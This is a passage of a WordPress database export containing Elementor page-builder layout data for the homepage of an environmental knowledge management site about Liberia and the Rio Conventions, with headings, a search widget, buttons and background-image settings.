Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5772,511,'_elementor_version','2.7.5'),(5773,511,'_elementor_template_type','wp-page'),(5776,512,'_wp_page_template','default'),(5777,512,'_elementor_edit_mode','builder'),(5778,512,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"115\",\"bottom\":\"0\",\"left\":\"115\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5779,512,'_elementor_version','2.7.5'),(5780,512,'_elementor_template_type','wp-page'),(5783,513,'_wp_page_template','default'),(5784,513,'_elementor_edit_mode','builder'),(5785,513,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{